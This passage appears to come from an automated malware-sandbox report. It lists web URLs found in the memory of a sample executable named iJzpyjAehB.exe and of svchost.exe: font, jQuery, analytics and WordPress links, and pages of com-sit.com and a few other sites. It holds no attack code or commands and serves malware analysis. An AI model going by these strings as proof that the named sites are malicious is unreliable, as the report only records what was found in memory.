                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.300368242.0000000004C10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.439075116.0000000008E00000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.302597912.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.311024379.0000000003180000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000002.596543130.0000000003910000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.467548512.00000000036B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.440284917.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.316183261.0000000003480000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.460052279.0000000000A40000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://ajax.googleapis.com/ajax/libs/scriptaculous/1.9.0/scriptaculous.js?ver=1.9.0
                      Source: iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.496913823.000000000332A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.w.org/
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.429302770.0000000008B00000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.434454926.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.432883313.00000000050A0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438584895.0000000003030000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.436653718.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438316131.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.435832282.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.435550642.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000002.596543130.0000000003910000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.434048283.0000000005050000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.431188888.0000000005050000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.467548512.00000000036B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.429996077.0000000005580000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.440284917.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.431935732.0000000005050000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.460052279.0000000000A40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://browsehappy.com/
                      Source: iJzpyjAehB.exe, 00000000.00000003.278941119.0000000003570000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.427667319.0000000005450000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.275586647.0000000003570000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.421181826.0000000002540000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.278509190.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.274065414.0000000003600000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292085282.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.291400658.0000000003580000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.275803176.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.414643624.0000000000A60000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.267371516.0000000003AD0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.434454926.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297414795.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296430221.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.271358037.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.432883313.00000000050A0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.428390043.0000000002530000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.274386745.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://code.jquery.com/jquery-2.1.4.min.js
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://com-sit.com/leistungen/
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://com-sit.com/leistungen/central-warehouse/
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://com-sit.com/leistungen/intelligent-sourcing/
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://com-sit.com/wp-content/uploads/2018/11/Intelligent_Sourcing_GREY.png
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://com-sit.com/wp-content/uploads/2018/11/Ueberstandsmanagement-gray.png
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://com-sit.com/wp-content/uploads/2018/11/central-warehouse-grey.png
                      Source: iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://com-sit.com/wp-content/uploads/2018/11/mehr-erfahren-btn.png
                      Source: iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297414795.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296430221.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296772064.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297118541.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297246492.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.294223177.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.293737431.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.302597912.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.311024379.0000000003180000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296882076.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297881797.00000000031D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.316183261.0000000003480000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297579920.0000000003090000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292770939.0000000008C00000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.295151770.00000000035D0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css2?family=Poppins%3Aital%2Cwght%400%2C100%3B0%2C200%3B0%2C300%3B0%2C5
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.427667319.0000000005450000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292085282.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.291400658.0000000003580000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.434454926.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297414795.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296430221.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.432883313.00000000050A0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.428390043.0000000002530000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438584895.0000000003030000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296772064.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292541963.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.436653718.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438316131.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297118541.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297246492.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.286207911.00000000035B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Roboto%3A100%2C100italic%2C200%2C200italic%2C300%2C300italic
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.427667319.0000000005450000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292085282.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.291400658.0000000003580000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.434454926.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297414795.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296430221.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.432883313.00000000050A0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.428390043.0000000002530000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438584895.0000000003030000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296772064.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292541963.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.436653718.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438316131.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297118541.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297246492.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.286207911.00000000035B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Roboto%3A300%2C300i%2C400%2C400i%2C700%2C700i&#038;subset=la
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.427667319.0000000005450000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292085282.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.291400658.0000000003580000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.434454926.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297414795.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296430221.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.432883313.00000000050A0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.428390043.0000000002530000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438584895.0000000003030000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296772064.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292541963.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.436653718.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438316131.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297118541.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297246492.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.286207911.00000000035B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Roboto:400
                      Source: iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438584895.0000000003030000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296772064.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292541963.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.436653718.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438316131.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297118541.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297246492.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.286207911.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.294223177.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.435832282.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.293737431.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.426644562.0000000008600000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.435550642.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.302597912.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.282511470.0000000003580000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.311024379.0000000003180000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000002.596543130.0000000003910000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.434048283.0000000005050000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296882076.00000000035F0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://gmpg.org/xfn/11
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.429302770.0000000008B00000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.434454926.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.432883313.00000000050A0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438584895.0000000003030000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.436653718.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438316131.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.435832282.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.435550642.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000002.596543130.0000000003910000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.434048283.0000000005050000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.431188888.0000000005050000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.467548512.00000000036B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.429996077.0000000005580000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.440284917.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.431935732.0000000005050000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.460052279.0000000000A40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://hm.baidu.com/hm.js?520556228c0113270c0c772027905838
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://hu-manity.co/
                      Source: iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://inhouse.pohlfood.com/
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://layerslider.com
